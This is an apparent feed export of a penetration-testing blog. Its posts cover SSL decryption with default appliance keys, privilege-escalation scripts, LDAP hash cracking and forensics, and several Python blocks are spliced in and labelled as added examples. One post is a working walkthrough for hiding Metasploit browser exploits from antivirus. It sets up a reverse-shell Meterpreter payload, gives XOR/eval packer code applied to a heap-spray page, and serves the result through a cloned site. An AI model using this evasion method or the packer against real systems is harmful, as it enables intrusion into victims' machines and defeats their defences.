tag:blogger.com,1999:blog-32226857062527942024-03-13T05:37:08.139-04:00GREP:8000 Electronic Research LabNetwork Security MonitoringGrephttp://www.blogger.com/profile/06871164484592521589noreply@blogger.comBlogger16125tag:blogger.com,1999:blog-3222685706252794.post-6816103124699317072011-02-19T11:58:00.002-05:002011-02-19T11:58:50.088-05:00Pwn Plug article on InfoSec Island!<div style="font-family: Arial,Helvetica,sans-serif;"><span style="font-size: small;"><a href="https://www.infosecisland.com/blogview/11828-Wheres-My-Creeper-Box.html">https://www.infosecisland.com/blogview/11828-Wheres-My-Creeper-Box.html</a> </span></div>Grephttp://www.blogger.com/profile/06871164484592521589noreply@blogger.com0tag:blogger.com,1999:blog-3222685706252794.post-44159898823956407742010-12-20T20:28:00.000-05:002010-12-20T20:28:20.818-05:00Using default private keys to decrypt SSL streams<span style="font-size: small;"><span style="font-family: "Trebuchet MS",sans-serif;">An old but hugely overlooked issue. Many appliance vendors ship their units with a default private key for SSL communications. Even if you reissue a new certificate, your appliance could still be using the same private key as everyone else's, and that key is typically bundled within the firmware packages the appliance vendor distributes publicly. 
This affects everything from DD-WRT to enterprise-class VPN appliances, tape libraries, and firewalls.</span><br style="font-family: "Trebuchet MS",sans-serif;" /><br style="font-family: "Trebuchet MS",sans-serif;" /><span style="font-family: "Trebuchet MS",sans-serif;">Well, someone has finally begun cataloguing these into a searchable database:</span><br style="font-family: "Trebuchet MS",sans-serif;" /><a href="http://www.devttys0.com/2010/12/breaking-ssl-on-embedded-devices/"><span style="font-family: "Trebuchet MS",sans-serif;">http://www.devttys0.com/2010/12/breaking-ssl-on-embedded-devices/</span></a><br style="font-family: "Trebuchet MS",sans-serif;" /><span style="font-family: "Trebuchet MS",sans-serif;"> </span><br style="font-family: "Trebuchet MS",sans-serif;" /><span style="font-family: "Trebuchet MS",sans-serif;">Just look up the device in question, point the lookup tool at a running appliance, or feed it a packet capture or a live network interface, and it will return any known private keys.</span><br style="font-family: "Trebuchet MS",sans-serif;" /><br style="font-family: "Trebuchet MS",sans-serif;" /><span style="font-family: "Trebuchet MS",sans-serif;">Once the private key is obtained, you can decrypt the SSL stream with tshark:</span><br style="font-family: "Trebuchet MS",sans-serif;" /><br style="font-family: "Trebuchet MS",sans-serif;" /><b><span style="font-family: "Trebuchet MS",sans-serif;">tshark -nn -t ad -r [pcap_file] -o ssl.keys_list:[https_server_ip],443,http,"[private_key.pem]" -V -R http</span></b><br style="font-family: "Trebuchet MS",sans-serif;" /><br style="font-family: "Trebuchet MS",sans-serif;" /><span style="font-family: "Trebuchet MS",sans-serif;">(Newer Wireshark releases replaced the -R read filter with the -Y display filter and configure RSA keys through the TLS protocol preferences' RSA keys list instead of ssl.keys_list; the preconditions below are unchanged.)</span><br style="font-family: "Trebuchet MS",sans-serif;" /><br style="font-family: "Trebuchet MS",sans-serif;" /><span style="font-family: "Trebuchet MS",sans-serif;">Note: For successful decryption, the initial full SSL handshake must be present in the capture. A full SSL handshake contains ClientHello, ServerHello, Certificate, ServerHelloDone and ClientKeyExchange. The server's private key only recovers the session keys when the negotiated cipher suite uses RSA key exchange, where the premaster secret is RSA-encrypted to the server's key; DHE and ECDHE suites derive the keys from an ephemeral exchange that the private key does not unlock, so those streams stay encrypted even with a complete handshake in the capture. 
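Added example, not the blog's own tooling or the devttys0 lookup tool: a small Python parser that walks a raw client-to-server TLS record stream and reports whether the preconditions above hold, that is a full handshake rather than a resumed session, a ClientKeyExchange in the capture, and an RSA key-exchange cipher suite. The three sample streams are hand-built, the cipher-suite sets list only the common suites, and handshake messages are assumed not to be fragmented across records.

```python
"""Can tshark decrypt this TLS stream with the server's RSA private key?

Added example, not the blog's own tooling: parses a raw TLS record stream and
checks (1) a full handshake is present, (2) it was not a resumed session, and
(3) the cipher suite uses RSA key exchange.  Sample streams are constructed.
"""
import struct

CONTENT_CCS, CONTENT_HANDSHAKE = 20, 22
HS_CLIENT_HELLO, HS_SERVER_HELLO, HS_CERTIFICATE = 1, 2, 11
HS_SERVER_KEY_EXCHANGE, HS_SERVER_HELLO_DONE, HS_CLIENT_KEY_EXCHANGE = 12, 14, 16

# Common suites where the premaster secret is RSA-encrypted to the server key
# (decryptable with that key) versus (EC)DHE suites (forward secret, not decryptable).
RSA_KX_SUITES = {0x000A, 0x002F, 0x0035, 0x003C, 0x003D, 0x009C, 0x009D}
FORWARD_SECRET_SUITES = {0x0033, 0x0039, 0x009E, 0x009F, 0xC013, 0xC014, 0xC02F, 0xC030}


def iter_records(stream):
    """Yield (content_type, payload) for each 5-byte-header TLS record."""
    off = 0
    while off + 5 <= len(stream):
        ctype = stream[off]
        (length,) = struct.unpack("!H", stream[off + 3:off + 5])
        payload = stream[off + 5:off + 5 + length]
        if len(payload) < length:
            raise ValueError("truncated TLS record at offset %d" % off)
        yield ctype, payload
        off += 5 + length


def iter_handshakes(payload):
    """Yield (msg_type, body) for the handshake messages inside one record.
    Assumes messages are not fragmented across records (real captures can be)."""
    off = 0
    while off + 4 <= len(payload):
        mtype = payload[off]
        mlen = int.from_bytes(payload[off + 1:off + 4], "big")
        yield mtype, payload[off + 4:off + 4 + mlen]
        off += 4 + mlen


def classify(stream):
    """Return {'decryptable': bool, 'cipher_suite': int or None, 'reason': str}."""
    seen, suite = set(), None
    for ctype, payload in iter_records(stream):
        if ctype == CONTENT_CCS:
            break                      # everything after ChangeCipherSpec is encrypted
        if ctype != CONTENT_HANDSHAKE:
            continue
        for mtype, body in iter_handshakes(payload):
            seen.add(mtype)
            if mtype == HS_SERVER_HELLO:
                # ServerHello: version(2) random(32) session_id_len(1) session_id suite(2) ...
                sid_len = body[34]
                (suite,) = struct.unpack("!H", body[35 + sid_len:37 + sid_len])

    def verdict(ok, reason):
        return {"decryptable": ok, "cipher_suite": suite, "reason": reason}

    if HS_SERVER_HELLO not in seen:
        return verdict(False, "no ServerHello: the handshake is not in this capture")
    if HS_CERTIFICATE not in seen:
        return verdict(False, "abbreviated handshake (session resumption): keys came from an earlier session")
    if suite in FORWARD_SECRET_SUITES:
        return verdict(False, "(EC)DHE key exchange: the server private key does not recover the session keys")
    if suite not in RSA_KX_SUITES:
        return verdict(False, "cipher suite 0x%04x is not in the RSA key-exchange list" % suite)
    if HS_CLIENT_KEY_EXCHANGE not in seen:
        return verdict(False, "ClientKeyExchange missing: capture cut off mid-handshake")
    return verdict(True, "full handshake with RSA key exchange")


# --- constructed sample streams (hand-built, not real captures) -------------
def _record(ctype, payload):
    return bytes([ctype, 3, 1]) + struct.pack("!H", len(payload)) + payload


def _hs(mtype, body):
    return bytes([mtype]) + len(body).to_bytes(3, "big") + body


def _server_hello(suite, session_id=b""):
    body = (b"\x03\x01" + b"\x00" * 32 + bytes([len(session_id)]) + session_id
            + struct.pack("!H", suite) + b"\x00")
    return _hs(HS_SERVER_HELLO, body)


CLIENT_HELLO = _record(CONTENT_HANDSHAKE, _hs(
    HS_CLIENT_HELLO, b"\x03\x01" + b"\x11" * 32 + b"\x00" + b"\x00\x02\x00\x2f" + b"\x01\x00"))

FULL_RSA = (CLIENT_HELLO
            + _record(CONTENT_HANDSHAKE, _server_hello(0x002F) + _hs(HS_CERTIFICATE, b"\x00\x00\x00")
                      + _hs(HS_SERVER_HELLO_DONE, b""))
            + _record(CONTENT_HANDSHAKE, _hs(HS_CLIENT_KEY_EXCHANGE, b"\x00\x04" + b"\xaa" * 4))
            + _record(CONTENT_CCS, b"\x01"))

FULL_ECDHE = (CLIENT_HELLO
              + _record(CONTENT_HANDSHAKE, _server_hello(0xC02F) + _hs(HS_CERTIFICATE, b"\x00\x00\x00")
                        + _hs(HS_SERVER_KEY_EXCHANGE, b"\x03\x00\x17") + _hs(HS_SERVER_HELLO_DONE, b""))
              + _record(CONTENT_HANDSHAKE, _hs(HS_CLIENT_KEY_EXCHANGE, b"\x04" + b"\xbb" * 4))
              + _record(CONTENT_CCS, b"\x01"))

RESUMED = (CLIENT_HELLO
           + _record(CONTENT_HANDSHAKE, _server_hello(0x002F, session_id=b"\x42" * 8))
           + _record(CONTENT_CCS, b"\x01")
           + _record(CONTENT_HANDSHAKE, b"\xde\xad\xbe\xef" * 10))   # encrypted Finished

if __name__ == "__main__":
    for name, stream in (("full RSA", FULL_RSA), ("full ECDHE", FULL_ECDHE), ("resumed", RESUMED)):
        print("%-11s %s" % (name, classify(stream)["reason"]))
```

Run it on the bytes of one TCP stream (for example the output of tshark's "Follow TCP Stream" saved as raw) before reaching for the key: a resumed session or an ECDHE suite will never decrypt no matter which key file you point tshark at.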
If you only see ClientHello, ServerHello, ChangeCipherSpec, this is a resumption of a previously established SSL session: the session keys were derived during an earlier full handshake that is not in this capture, so it cannot be decrypted as is.</span></span>Grephttp://www.blogger.com/profile/06871164484592521589noreply@blogger.com0tag:blogger.com,1999:blog-3222685706252794.post-9638578711891030852010-12-03T10:44:00.000-05:002010-12-03T10:44:29.806-05:00Meterpreter scripts for RunAs privilege escalation & other mischief<div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><b>send_keystrokes.rb: </b>Meterpreter script to interactively send keystrokes to an open application window using the VBScript SendKeys method. Can be used to escalate privileges into RunAs-invoked command shells on XP.</span></div><div style="font-family: "Trebuchet MS",sans-serif;"><br />
</div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><b>IE_click_run.rb:</b> Meterpreter script to interactively click "Run" at the IE "File Download Security Warning" prompts. Can be used to escalate privileges into RunAs-invoked IE instances without end-user interaction</span><span style="font-size: small;"> on XP</span><span style="font-size: small;">.</span></div><div style="font-family: "Trebuchet MS",sans-serif;"><br />
</div><div style="font-family: "Trebuchet MS",sans-serif;"><a href="http://code.google.com/p/metscripts/downloads/list"><span style="font-size: small;">http://code.google.com/p/metscripts/downloads/list</span></a><span style="font-size: small;"> </span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"></span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"></span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"></span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"></span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><a href="http://grep8000.blogspot.com/2010/04/windows-privilege-escalation-talk.html">http://grep8000.blogspot.com/2010/04/windows-privilege-escalation-talk.html</a></span></div><div style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: small;"><br />
</span></div>Grephttp://www.blogger.com/profile/06871164484592521589noreply@blogger.com0tag:blogger.com,1999:blog-3222685706252794.post-53401654844043171012010-12-03T08:58:00.005-05:002010-12-03T09:26:36.847-05:00JavaScript Obfuscation of Metasploit Browser Exploits for AV bypass<span style="font-size: small;"><span style="font-family: "Trebuchet MS",sans-serif;">1. Configure the desired browser exploit and payload. Example using ms10_xxx_ie_css_clip</span>:<br />
<br />
<span style="font-family: "Trebuchet MS",sans-serif;">Module options:</span><br />
<br />
<span style="font-family: "Trebuchet MS",sans-serif;"> Name Current Setting Required Description</span><br style="font-family: "Trebuchet MS",sans-serif;" /><span style="font-family: "Trebuchet MS",sans-serif;"> ---- --------------- -------- -----------</span><br style="font-family: "Trebuchet MS",sans-serif;" /><span style="font-family: "Trebuchet MS",sans-serif;"> SRVHOST 10.20.30.40 yes The local host to listen on.</span><br style="font-family: "Trebuchet MS",sans-serif;" /><span style="font-family: "Trebuchet MS",sans-serif;"> SRVPORT 80 yes The local port to listen on.</span><br style="font-family: "Trebuchet MS",sans-serif;" /><span style="font-family: "Trebuchet MS",sans-serif;"> SSL false no Negotiate SSL for incoming connections</span><br style="font-family: "Trebuchet MS",sans-serif;" /><span style="font-family: "Trebuchet MS",sans-serif;"> SSLVersion SSL3 no Specify the version of SSL that should be used</span><br style="font-family: "Trebuchet MS",sans-serif;" /><span style="font-family: "Trebuchet MS",sans-serif;"> URIPATH /example no The URI to use for this exploit (default is random)</span><br />
<br />
<span style="font-family: "Trebuchet MS",sans-serif;">Payload options (windows/meterpreter/reverse_tcp):</span><br />
<br />
<span style="font-family: "Trebuchet MS",sans-serif;"> Name Current Setting Required Description</span><br style="font-family: "Trebuchet MS",sans-serif;" /><span style="font-family: "Trebuchet MS",sans-serif;"> ---- --------------- -------- -----------</span><br style="font-family: "Trebuchet MS",sans-serif;" /><span style="font-family: "Trebuchet MS",sans-serif;"> EXITFUNC process yes Exit technique: seh, thread, none, process</span><br style="font-family: "Trebuchet MS",sans-serif;" /><span style="font-family: "Trebuchet MS",sans-serif;"> LHOST 10.20.30.40 yes The listen address</span><br style="font-family: "Trebuchet MS",sans-serif;" /><span style="font-family: "Trebuchet MS",sans-serif;"> LPORT 443 yes The listen port</span><br />
<br />
<span style="font-family: "Trebuchet MS",sans-serif;">Exploit target:</span><br />
<br />
<span style="font-family: "Trebuchet MS",sans-serif;"> Id Name</span><br style="font-family: "Trebuchet MS",sans-serif;" /><span style="font-family: "Trebuchet MS",sans-serif;"> -- ----</span><br style="font-family: "Trebuchet MS",sans-serif;" /><span style="font-family: "Trebuchet MS",sans-serif;"> 0 Automatic</span><br />
<br />
<span style="font-family: "Trebuchet MS",sans-serif;">2. Run "exploit" to start the HTTP server (port 80) and the payload handler (port 443).<br />
3. Fetch the exploit URI with wget, using --user-agent to present the User-Agent string of the browser you're targeting, since the module picks the exploit page it serves from the reported browser. Example for IE7 on XP targets:</span><br />
<br />
<span style="font-family: "Trebuchet MS",sans-serif;">wget http://10.20.30.40/example --user-agent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; bgft)"</span><br />
<br />
<span style="font-family: "Trebuchet MS",sans-serif;">4. View the HTML source and copy all JavaScript between the "script" tags.</span></span><br />
<span style="font-size: small;"><span style="font-family: "Trebuchet MS",sans-serif;">5. Feed to a JavaScript obfuscator of your liking. Examples:<br />
<br />
<a href="http://www.daftlogic.com/projects-online-javascript-obfuscator.htm">http://www.daftlogic.com/projects-online-javascript-obfuscator.htm</a><br />
<a href="http://javascriptcompressor.com/">http://javascriptcompressor.com</a><br />
<a href="http://dean.edwards.name/weblog/2007/04/packer3">http://dean.edwards.name/weblog/2007/04/packer3</a><br />
<br />
6. Copy obfuscated JS into a new HTML file.<br />
7. Start a new multi/handler with the same payload (windows/meterpreter/reverse_tcp) and LPORT as configured above (443 here, or whatever your payload requires) to receive the shell.</span><span style="font-family: "Trebuchet MS",sans-serif;"><br />
8. Serve the newly obfuscated HTML from BackTrack 4 (BT4) through Apache, or clone a site with SET and edit the embedded iframe tag to point at your HTML file.<br />
<br />
Bam. 0-day with AV bypass? Yeah, you're on the pwnie express. :}</span><br />
<span style="font-family: "Trebuchet MS",sans-serif;">Caveat: packing only hides the page from static signatures on the wire and on disk. AV engines that emulate JavaScript unwrap an eval() stub before scanning, and the decoded exploit is exactly what runs in the browser, so behaviour-based detection is unaffected.</span><br />
<span style="font-family: "Trebuchet MS",sans-serif;">Thanks to Will Metcalf for pointing me in the right direction!</span><br />
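Steps 4 to 6 above as code, added here and not part of the original post or any of the linked packers: pull the script bodies out of the page wget returned, wrap each in a self-decoding stub, and write a fresh HTML file. The packer is a deliberately simple XOR-and-fromCharCode wrapper written in IE6/7-era JScript (no Array.prototype.map), so that its inverse can be checked in Python; the sample page is constructed and is not real module output.

```python
"""Steps 4-6 of the post as code: extract <script> bodies, pack them in a
self-decoding stub, emit a new page.  Added example, not from the original
post; the sample page is constructed, not real Metasploit output."""
import re

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.IGNORECASE | re.DOTALL)

# Decoder stub: XOR every code point with the key, then eval the rebuilt string.
DECODER_PREFIX = ('eval((function(a,k){for(var s="",i=0;i<a.length;i++)'
                  's+=String.fromCharCode(a[i]^k);return s})([')


def extract_scripts(page):
    """Step 4: the JavaScript body of every <script> element, in page order."""
    return [m.group(1) for m in SCRIPT_RE.finditer(page)]


def pack(js, key=0x5A):
    """Step 5: only the literal bytes change; the exploit logic is untouched."""
    if not 1 <= key <= 0xFF:
        raise ValueError("key must be a non-zero byte")
    codes = ",".join(str(ord(c) ^ key) for c in js)
    return "%s%s],%d))" % (DECODER_PREFIX, codes, key)


def unpack(packed):
    """Python-side inverse of pack(), to check the wrapper round-trips."""
    if not (packed.startswith(DECODER_PREFIX) and packed.endswith("))")):
        raise ValueError("not a pack() wrapper")
    codes, key = packed[len(DECODER_PREFIX):-2].rsplit("],", 1)
    key = int(key)
    return "".join(chr(int(c) ^ key) for c in codes.split(",") if c)


def build_page(scripts, key=0x5A):
    """Step 6: a fresh HTML file carrying only the packed scripts."""
    body = "\n".join("<script>%s</script>" % pack(js, key) for js in scripts)
    return "<html><body>\n%s\n</body></html>\n" % body


# Constructed stand-in for the page wget fetched (NOT the real module output).
SAMPLE_PAGE = """<html><head><title>example</title></head><body>
<script type="text/javascript">
var shellcode = unescape("%u9090%u9090");
var spray = new Array();
for (var i = 0; i < 200; i++) { spray[i] = shellcode + new Array(1024).join("A"); }
</script>
<div style="clip:rect(0px,0px,0px,0px)">x</div>
<script>document.write("<b>loading</b>");</script>
</body></html>"""

if __name__ == "__main__":
    scripts = extract_scripts(SAMPLE_PAGE)
    assert all(unpack(pack(s)) == s for s in scripts)
    print(build_page(scripts))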
<br />
<b><span style="font-family: "Trebuchet MS",sans-serif;">References:</span></b><br style="font-family: "Trebuchet MS",sans-serif;" /><a href="http://rules.emergingthreats.net/research/WMetcalf-CVE-2010-3962/"><span style="font-family: "Trebuchet MS",sans-serif;">http://rules.emergingthreats.net/research/WMetcalf-CVE-2010-3962/</span></a><br style="font-family: "Trebuchet MS",sans-serif;" /><a href="http://relentless-coding.blogspot.com/2010/07/new-javascript-packer-jsidle.html"><span style="font-family: "Trebuchet MS",sans-serif;">http://relentless-coding.blogspot.com/2010/07/new-javascript-packer-jsidle.html</span></a><br style="font-family: "Trebuchet MS",sans-serif;" /><a href="http://grey-corner.blogspot.com/2010/01/heap-spray-exploit-tutorial-internet.html"><span style="font-family: "Trebuchet MS",sans-serif;">http://grey-corner.blogspot.com/2010/01/heap-spray-exploit-tutorial-internet.html</span></a></span>Grephttp://www.blogger.com/profile/06871164484592521589noreply@blogger.com1tag:blogger.com,1999:blog-3222685706252794.post-84301091578178152822010-07-09T20:56:00.020-04:002010-11-01T19:47:04.276-04:00Introducing.. the Pwn Plug!<div style="font-family: 'Trebuchet MS',sans-serif;"><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1SWiPiaE1SeekVZKnA9QmX8opD12jN9-t11IYyogm6pHNjxusj8dPaWJpPPD0s7s_FS3GmisLVxaEVQlfnPKqbMTu7BLlRgAyOuDUa-9SCdhhQCJ_v5fS4S7JH6zFJrIuOnLDDqHhBVg/s1600/sheevaplug.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="132" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1SWiPiaE1SeekVZKnA9QmX8opD12jN9-t11IYyogm6pHNjxusj8dPaWJpPPD0s7s_FS3GmisLVxaEVQlfnPKqbMTu7BLlRgAyOuDUa-9SCdhhQCJ_v5fS4S7JH6zFJrIuOnLDDqHhBVg/s200/sheevaplug.jpg" width="200" /></a></div><span style="font-size: small;"></span><br />
<span style="font-size: small;">A SheevaPlug microserver loaded <br />
with pentesting goodness!<br />
:: Preloaded with Ubuntu, Metasploit, Fasttrack, SET, SSLstrip, nmap, dsniff, netcat, nikto, nbtscan, xprobe2, inguma, scapy, ettercap, JTR, medusa, & more<br />
:: Maintains a reverse persistent SSH tunnel to your external pentest box, with support for tunneling over HTTP and ICMP<br />
:: Traverses strict egress firewall filters, webfilters, HTTP proxies, and application-aware firewalls<br />
:: Unpingable & no open ports in stealth mode<br />
:: 4.3 x 2.7 x 1.9 inches, 2.3 watts when idle<br />
:: 1.2 GHz ARM CPU with 512 MB SDRAM and 512 MB NAND flash</span><span style="font-size: small;"></span><br />
<br />
</div><div style="font-family: 'Trebuchet MS',sans-serif;"><span style="font-size: small;"><br />
<span style="font-size: small;"><span style="font-family: "Trebuchet MS",sans-serif;">Now selling through Rocket Bear Labs: <a href="http://www.rocketbearlabs.com/pwn-plug.html">http://www.rocketbearlabs.com/pwn-plug.html</a></span></span>Grephttp://www.blogger.com/profile/06871164484592521589noreply@blogger.com4tag:blogger.com,1999:blog-3222685706252794.post-53401654844043171012010-06-13T18:01:00.003-04:002010-06-13T18:08:12.210-04:00Decoding OpenLDAP & IBM Directory Server password hashes<span style="font-size: small;">OpenLDAP {SHA} values are the scheme tag followed by the base64 encoding of the raw 20-byte SHA-1 digest of the password (unsalted). Example:</span><br />
<span style="font-size: small;">userpassword:: {SHA}W6ph5Mm5Pz8GgiULbPgzG37mj9g=<br />
<br />
The raw digest can be extracted from this with the help of fdump (<a href="http://sourceforge.net/projects/fdump/files/">http://sourceforge.net/projects/fdump/files/</a>), which prints the decoded bytes as hex:</span>
<span style="font-size: small;">echo -n W6ph5Mm5Pz8GgiULbPgzG37mj9g= |base64 -d - |fdump -<br />
<br />
IBM Directory Server, while based on OpenLDAP, implements a botched version of this. Instead of base64 encoding the SHA hash only, they encode the "{SHA}" prefix as well. Example:</span><br />
<span style="font-size: small;">userpassword:: e1NIQX1bqmHkybk/PwaCJQts+DMbfuaP2A==<br />
<br />
The SHA hash can be extracted in the same manner by cutting the hex for "{SHA}" (7b 53 48 41 7d) from the result:</span><br />
<span style="font-size: small;">echo -n e1NIQX1bqmHkybk/PwaCJQts+DMbfuaP2A== |base64 -d - |fdump - |cut -c 11-<br />
<br />
FTW, let's convert the IBM Directory Server userpassword field back to the OpenLDAP format:</span><br />
<span style="font-size: small;">echo -n e1NIQX1bqmHkybk/PwaCJQts+DMbfuaP2A== |base64 -d - |fdump - |cut -c 11- |xxd -r -p |base64 |awk '{print"{SHA}"$1}'<br />
<br />
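The same decoding and conversion without fdump, as an added example that is not part of the original post. The "::" in the LDIF lines above marks a base64-encoded attribute value; the IBM server stores the raw digest bytes after the "{SHA}" tag instead of base64 text, which is why the whole value comes out base64-wrapped on export. Both forms decode to the same digest, and since {SHA} is unsalted a candidate password can be checked directly.

```python
"""Decode OpenLDAP {SHA} and IBM Directory Server userpassword values and
convert the IBM form back to OpenLDAP's.  Added example, not from the post."""
import base64
import hashlib

SHA1_DIGEST_LEN = 20


def decode_userpassword(value):
    """Return (scheme, digest_bytes) for an LDAP userpassword value.

    Handles the OpenLDAP form  {SHA}<base64(digest)>  and the IBM Directory
    Server form  <base64("{SHA}" + digest)>  where the scheme tag was base64
    encoded together with the raw digest.
    """
    if value.startswith("{"):
        scheme, _, b64 = value.partition("}")
        return scheme.lstrip("{"), base64.b64decode(b64)
    raw = base64.b64decode(value)
    if raw.startswith(b"{"):
        tag, _, digest = raw.partition(b"}")
        return tag[1:].decode("ascii"), digest
    raise ValueError("no recognisable {SCHEME} tag")


def to_openldap(value):
    """Re-encode either form as OpenLDAP's {SCHEME}base64(digest)."""
    scheme, digest = decode_userpassword(value)
    return "{%s}%s" % (scheme, base64.b64encode(digest).decode("ascii"))


def check_password(value, candidate):
    """True if candidate hashes to the stored digest (unsalted {SHA} only)."""
    scheme, digest = decode_userpassword(value)
    if scheme.upper() != "SHA" or len(digest) != SHA1_DIGEST_LEN:
        raise ValueError("only unsalted {SHA} values are handled here")
    return hashlib.sha1(candidate.encode("utf-8")).digest() == digest


# The two values from the post (both are SHA-1 of the same password).
OPENLDAP_VALUE = "{SHA}W6ph5Mm5Pz8GgiULbPgzG37mj9g="
IBM_VALUE = "e1NIQX1bqmHkybk/PwaCJQts+DMbfuaP2A=="

if __name__ == "__main__":
    print(decode_userpassword(IBM_VALUE)[1].hex())
    print(to_openldap(IBM_VALUE))
    print(check_password(IBM_VALUE, "password"))
```

Feed the converted values to John the Ripper or hashcat as ordinary {SHA} hashes; the conversion is lossless because only the container changes, not the digest.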
This is called "taking it back". At $30,000 per IBM Directory Server license, I highly recommend it!</span>Grephttp://www.blogger.com/profile/06871164484592521589noreply@blogger.com0tag:blogger.com,1999:blog-3222685706252794.post-77541662014675215362010-06-13T16:56:00.003-04:002010-07-22T14:04:16.905-04:00Windows privilege escalation talk at first Defcon 802!Slide deck is available here: <a href="http://pdfcast.org/download/escalating-privileges-through-runas-processes.pdf">http://pdfcast.org/download/escalating-privileges-through-runas-processes.pdf<br />
<br />
</a>DC802: <a href="http://dc802.org/?p=64">http://dc802.org/?p=64</a><a href="http://pdfcast.org/download/escalating-privileges-through-runas-processes.pdf"><br />
</a>Grephttp://www.blogger.com/profile/06871164484592521589noreply@blogger.com0tag:blogger.com,1999:blog-3222685706252794.post-83173446491624078572010-04-18T20:13:00.001-04:002010-07-22T14:05:30.137-04:00Windows Privilege Escalation Talk - BSides BostonPresented on Saturday, April 24, 4pm @ Security BSides Boston:<br />
<br />
# <b>Title: Escalating privileges through Secondary Logon (RunAs) processes</b><br />
<br />
<b># Abstract:</b> The scenario: You target a sysadmin PC and obtain a backdoor shell through a browser exploit, PDF with embedded payload, or similar client-side vector. However, because the organization is using RunAs best practices, your shell is running with limited user privileges. Some RunAs-invoked programs are running under the sysadmin's Domain Admin account, but you can't directly migrate to these processes from a limited user shell. The RunAs framework indicates that a user-level process should not be allowed to send commands to a greater privilege process. Sounds fairly solid, but as always, there are exceptions..<br />
<br />
Slide deck is available here: <a href="http://pdfcast.org/download/escalating-privileges-through-runas-processes.pdf">http://pdfcast.org/download/escalating-privileges-through-runas-processes.pdf</a><br />
<br />
BSides Boston: <a href="http://www.securitybsides.com/BSidesBostonTalks">http://www.securitybsides.com/BSidesBostonTalks</a>Grephttp://www.blogger.com/profile/06871164484592521589noreply@blogger.com0tag:blogger.com,1999:blog-3222685706252794.post-52729879373481132062009-09-09T22:04:00.005-04:002009-09-09T22:11:19.067-04:00Forensics: Recovering a 12-year-old floppy disk with DD<span style="font-family: trebuchet ms; font-size: small;">True story. Earlier this year I was handed a 12-year-old floppy disk loaded with bad sectors and unmountable due to a missing/corrupted partition table. A lost cause? Nope. dd (here dcfldd, its forensic variant) can still image the raw media: conv=noerror keeps reading past unreadable sectors, and conv=sync pads each failed or short read with zeros so every later byte keeps its original offset and file structures stay intact wherever possible. The padding replaces the whole read block, so the block size sets the price of a bad sector: with bs=512 one bad sector costs one sector, with bs=4k the surrounding 4 KiB block is zero-filled. <br />
<br />
I booted up a Helix Live CD and ran:<br />
<strong>dcfldd if=/dev/fd0 of=floppy.img bs=4k conv=noerror,sync</strong><br />
<br />
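Added example, not from the original post: the imaging loop dd performs under conv=noerror,sync, run against an in-memory stand-in for /dev/fd0 with one deliberately unreadable sector, to show what the block size costs. The device and its contents are constructed, and it assumes a read that covers a bad sector fails as a whole, which is the pessimistic case.

```python
"""What `dd conv=noerror,sync` does to a medium with bad sectors, and what the
block size costs.  Added example, not from the original post: the device is a
constructed in-memory stand-in for /dev/fd0."""

SECTOR = 512
FLOPPY_SECTORS = 2880          # 1.44 MB high-density floppy


class FlakyDevice:
    """Stand-in for /dev/fd0: any read that covers a bad sector fails with EIO."""

    def __init__(self, data, bad_sectors):
        self.data = data
        self.bad = set(bad_sectors)
        self.pos = 0

    def read(self, size):
        start = self.pos
        end = min(start + size, len(self.data))
        self.pos = end                      # position advances even on error, like a drive
        if any(start <= s * SECTOR < end for s in self.bad):
            raise OSError(5, "Input/output error")
        return self.data[start:end]


def dd_noerror_sync(device, bs):
    """Image `device` the way `dd bs=<bs> conv=noerror,sync` does."""
    out = bytearray()
    while device.pos < len(device.data):
        try:
            chunk = device.read(bs)
        except OSError:
            chunk = b""                     # noerror: keep going after a failed read
        out += chunk.ljust(bs, b"\x00")     # sync: pad so later data keeps its offset
    return bytes(out)


def bytes_lost(original, image):
    """Bytes in the image that no longer match the medium."""
    return sum(1 for a, b in zip(original, image) if a != b)


def constructed_floppy():
    """1,474,560 bytes with no zero byte, so every padded byte counts as lost."""
    return bytes(1 + (i % 255) for i in range(FLOPPY_SECTORS * SECTOR))


def loss_for(bs, bad_sectors, data=None):
    """Image a floppy with the given bad sectors at block size bs; return bytes lost."""
    data = data if data is not None else constructed_floppy()
    image = dd_noerror_sync(FlakyDevice(data, bad_sectors), bs)
    assert len(image) == len(data)          # sync keeps the image the size of the medium
    return bytes_lost(data, image)


if __name__ == "__main__":
    disk = constructed_floppy()
    for bs in (512, 4096):
        print("bs=%d: %d bytes zero-filled for one bad sector" % (bs, loss_for(bs, [1000], disk)))
```

On a real drive the floppy driver may return a short read up to the bad sector instead of failing the whole block, in which case the loss sits between the two figures; the image size and offsets are preserved either way.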
After much grinding and hissing, DD finished with a fully intact 1.4MB floppy disk image. Almost made me want to scour through my old floppy collection. Almost..</span>Grephttp://www.blogger.com/profile/06871164484592521589noreply@blogger.com1tag:blogger.com,1999:blog-3222685706252794.post-73173348387793440432009-08-22T19:16:00.002-04:002009-08-22T19:18:02.676-04:00NSM: Parsing HTTP sessions with tcpflow<span style="font-family: trebuchet ms; font-size: small;"><b>:: Show HTTP requests, replies, etc:</b> tcpflow -i <i>[interface]</i> -c -s port 80 | grep HTTP</span><br />
<span style="font-family: trebuchet ms; font-size: small;"><b>:: Show all readable HTTP strings: </b>tcpflow -i <i>[interface]</i> -c -s port 80 | grep -v "\.\."</span><br />
<span style="font-family: trebuchet ms; font-size: small;"><b>:: Save HTTP flows to local files:</b> tcpflow -i <i>[interface]</i> -s port 80</span><br />
<span style="font-family: trebuchet ms; font-size: small;"><br />
